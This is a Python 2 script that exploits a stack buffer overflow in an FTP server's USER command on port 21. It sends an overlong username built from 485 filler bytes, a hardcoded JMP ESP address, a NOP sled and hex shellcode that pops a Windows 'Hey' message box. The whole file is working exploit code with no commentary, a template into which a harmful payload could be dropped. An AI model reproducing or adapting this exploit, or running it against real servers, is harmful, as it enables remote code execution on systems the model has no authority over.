exploitpy.py

#!/usr/bin/python
import sys
import socket
hostname =sys.argv[1]
password="what"
jmpesp= "\x69\x2D\xB3\x7C"
buf="""\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9
    \xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32
    \xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51
    \x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff
    \xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff
    \xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff
    \xff\x48\x65\x79\x4e"""

username="A"*485 + jmpesp + "\x90"*16 + buf + "C" *(1024-485-20 -len(buf))
connect =socket.socket(socket.AF_INET,socket.SOCK_STREAM)

try:
	connect.connect((hostname,21))
except:
	print "connection error"
	response=connect.recv(2000)
	print response
	sys.exit(1)
connect.send("user %s\r\n" %username)
response=connect.recv(2000)
print response

connect.send("pass %s\r\n" %password)
response=connect.recv(2000)
print response
connect.close()